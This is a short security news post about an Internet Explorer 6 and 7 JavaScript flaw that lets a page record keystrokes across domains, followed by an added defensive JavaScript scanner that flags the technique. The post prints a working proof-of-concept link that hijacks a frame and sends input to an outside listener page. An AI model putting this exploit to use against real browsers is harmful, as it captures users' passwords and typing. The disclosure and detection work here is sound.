Internet Explorer 6 & 7 critical Javascript exploit
Ghacks has found a critical JavaScript vulnerability affecting Internet Explorer 6 and 7 that can be used to record a user's keystrokes even after he switches domains. A specially prepared website can launch JavaScript that records everything the user does afterwards, including text input, which naturally means usernames and passwords as well.
The following JavaScript code, when clicked, opens a new window (hackademix.net), hijacks one of the iframes, and captures keystrokes.
javascript:x=open('http://hackademix.net/');setInterval(function(){try{x.frames[0].location={toString:function(){return%20'http://www.sirdarckcat.net/caballero-listener.html';}}}catch(e){}},5000);void(1);
There is no fix for this vulnerability at this moment. If you're using IE 6 or IE 7, all you can do is disable JavaScript or allow it only on trusted domains. An explanation from the same researcher is available.
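As an added example (not from the original post or the researcher), this is a heuristic check a link filter could run over `javascript:` links to flag the construct in the snippet above: an object with its own `toString` assigned to a frame's location where a string URL is expected. The function names and the `a.example` / `b.example` sample links are constructed for illustration, and the match is a pattern heuristic, not a parser.

```javascript
// Added example: heuristic scanner for javascript: links (names are hypothetical).

// An object literal with its own toString assigned to a frame's location,
// where a plain string URL would normally be assigned.
const FRAME_LOCATION_OBJECT =
  /\.frames\s*\[[^\]]*\]\s*\.location\s*=\s*\{[^}]*\btoString\s*:/i;
// A handle to another window obtained through open() or window.open().
const OPENS_WINDOW = /(?:^|[^\w.])(?:window\.)?open\s*\(/i;
// A timer that keeps re-applying the assignment.
const REPEATS = /\bset(?:Interval|Timeout)\s*\(/i;

function decodeHref(href) {
  // Escapes such as %20 are decoded before matching.
  try {
    return decodeURIComponent(href);
  } catch (e) {
    return href; // malformed escapes: scan the raw text instead
  }
}

function inspectLink(href) {
  const text = decodeHref(String(href)).trim();
  const findings = [];
  if (!/^javascript:/i.test(text)) return { suspicious: false, findings };
  const body = text.slice('javascript:'.length);
  const objectAssigned = FRAME_LOCATION_OBJECT.test(body);
  if (objectAssigned) findings.push('object with toString assigned to frame location');
  if (OPENS_WINDOW.test(body)) findings.push('opens another window');
  if (REPEATS.test(body)) findings.push('runs on a timer');
  return { suspicious: objectAssigned, findings };
}

// Constructed sample links; a.example and b.example are placeholder hosts.
const SAMPLES = [
  "javascript:x=open('http://a.example/');setInterval(function(){try{" +
    "x.frames[0].location={toString:function(){return%20'http://b.example/l.html';}}" +
    "}catch(e){}},5000);void(1);",
  "javascript:parent.frames[0].location='http://a.example/page.html';void(0)",
  "javascript:window.open('http://a.example/help');void(0)",
  "http://a.example/search?q=frames[0].location",
];

function scanSamples() {
  return SAMPLES.map((href) => inspectLink(href).suspicious);
}

console.log(scanSamples());
```

Only the first sample is flagged; an ordinary string assignment to a frame's location and a plain `window.open` link are reported as not suspicious.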
Source: Ghacks
